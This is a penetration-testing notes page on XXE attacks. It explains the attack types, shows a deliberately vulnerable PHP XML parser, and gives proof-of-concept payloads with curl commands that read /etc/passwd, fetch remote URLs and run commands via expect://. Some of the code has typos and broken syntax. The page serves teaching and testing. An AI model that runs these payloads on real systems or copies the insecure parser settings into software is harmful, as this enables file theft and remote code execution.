Defender's Notes
  • Welcome!
  • Methodology
  • Ethical Hacking
  • Resources/Blogs/Conferences/Labs
  • Writing Vulnerability Reports
  • Linux Tips
  • Certifications
  • Bug Bounty
    • Hints
  • Python
  • PenTesting
    • Recon
    • Network Scanning
    • Reverse Shell Payloads
    • API Security Testing
    • 53 - DNS
    • 21 - ftp
    • 139,445 - SMB
    • 111,2049 - rcpbind
    • Authentication
    • Scripting
    • OSINT
    • Cloud Security
    • Reverse Engineering
    • Password
    • Proxy Chain
    • Steganography
    • Buffer Overflow
  • Windows
    • Recon
    • Golden/Silver Ticket
    • PowerShell for Beginners
    • Windows Priv Escalate
      • Icecast (RPC)
    • Kerberos Attack
  • Web Pentesting
    • 80,443,8080 - Recon
    • Resources
      • Burp Suite
    • Web Vulnerabilities
      • WordPress
      • CSP Bypass
      • JSON Web Tokens
      • Insecure Desensitization
      • Open Redirect
      • Command Injection
      • Path Traversals
      • SSRF
      • SQL Injection
      • IDOR
      • Shellshock
      • Heartbleed
      • Session Attacks/Bypass
      • XSS
      • XXE
      • CSRF
      • File Inclusion (Local/Remote)
      • Drupal
    • OWASP Top 10 2017
      • Top 1: Injection
      • Top 2: Broken Authentication
      • Top 3: Sensitive Data Exposure
      • Top 4: XML External Entities (XXE)
      • Top 5: Broken Access Control
      • Top 6: Security Misconfiguration
      • Top 7: Cross-Site Scripting (XSS)
      • Top 8: Insecure Deserialization
      • Top 9: Using Components with Known Vulnerabilities
      • Top 10: Insufficient Logging & Monitoring
    • OOB
    • Java
    • Python Web Security
  • Linux
    • Upgrading shell
    • Linux Priv Escalate
      • Path Variable Manipulation
      • Systemctl
  • Binary Security
    • AOT
  • Hardware Security
    • Wi-fi
    • Radio
  • Mobile Security
    • Android
    • SMS
  • Videos
    • IppSec Videos
    • The Cyber Mentor
Powered by GitBook
On this page
  • What is it?
  • Exploitation
  • Types of XXE attacks
  • SSRF via XXE
  • Example PoC
  • Payloads
  • Cheat sheet
  • Other Resources
  • References

Was this helpful?

  1. Web Pentesting
  2. Web Vulnerabilities

XXE

PreviousXSSNextCSRF

Last updated 4 years ago

Was this helpful?

What is it?

XML External Entities (XXE) is used to attack systems that parse XML input via file upload or other ways. The modified XML file would abuse SYSTEM entity and can be used to attack a Web application. Attacks include denial of service, local file disclosure, remote code execution, and more.

Extensive Markup Language (XML) is a language designed for desktop publishing, and now widely ued for data exchange. It is a markup language similar to HTML and derived from SGML which was based on IBM's GML back from 1960s. XML is typically used instead of HTML when data must be sent from one application to another (Data Interchange)

Exploitation

XXE flaws allow injection attacks. XML by default supports "external entities". Abuse of XXE flaw allows malicious profile to turn XML parser into a proxy, potentially serving local and remote content. (External entities vuln are similar to LFI/RFI). This can lead to RCE.

Types of XXE attacks

XXE Attack Type

Description

Exploiting XXE to Retrieve Files

Where an external entity is defined containing the contents of a file, and returned in the application's response.

Exploiting XXE to Perform SSRF Attacks

Where an external entity is defined based on a URL to a back-end system.

Exploiting Blind XXE Exfiltrate Data Out-of-Band

Where sensitive data is transmitted from the application server to a system that the attacker controls.

Exploiting blind XXE to Retrieve Data Via Error Messages

Where the attacker can trigger a parsing error message containing sensitive data.

SSRF via XXE

SSRF is related to CSRF. CSRF: Forged request originating from a client. SSRF: Forged request originating from a server

Example PoC

Having access to server side scripts. Below is the vulnerable server side php script that is working on /book.php site, which if you look at HTML source you will not find the code.

<?php
$xmlfile = file_get contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$xml = simplexml_import_dom($dom);
$author = $xml->author;
$title = $xml->title;
$date = $xml->publish_date;

echo "Thank you for you file submission!<br>";
echo "Your entry: <br>";
echo "Author: " . $author . <br>";
echo "Title: " . $title . <br>";
echo "Date: " . $date . <br>";
?>

Because above php page, has XML entry for author, title, and publish_date.

PoC 1- Testing payload (xxe.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "TEST" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload file via file upload on siteor Curl to send payload
curl -d@/home/test/xxe.xml http://test.com/book.php
# On browser route to http:

PoC 2 (LFI) - Display Local File (xxe2.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://etc/passwd" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe2.xml http://test.com/book.php

PoC 3 (RFI) - Access URL (xxe3.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://google.com/robots.txt" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe3.xml http://test.com/book.php

PoC 4 (RCE) - Remote Code Execution via php (xxe4.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe4.xml http://test.com/book.php

Sample payload

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [  
    <!ELEMENT foo (#ANY)>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Payloads

Cheat sheet

Other Resources

References

Good Resource for payloads:

OWASP XML Prevention Cheat Sheet:

OWASP's XML External Entity (XXE) Processing:

Blind XXE:

Exploiting XXE with local DTD files:

From blind XXE to root-level file read acces:

https://github.com/payloadbox/xxe-injection-payload-list
https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
https://portswigger.net/web-security/xxe/blind
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/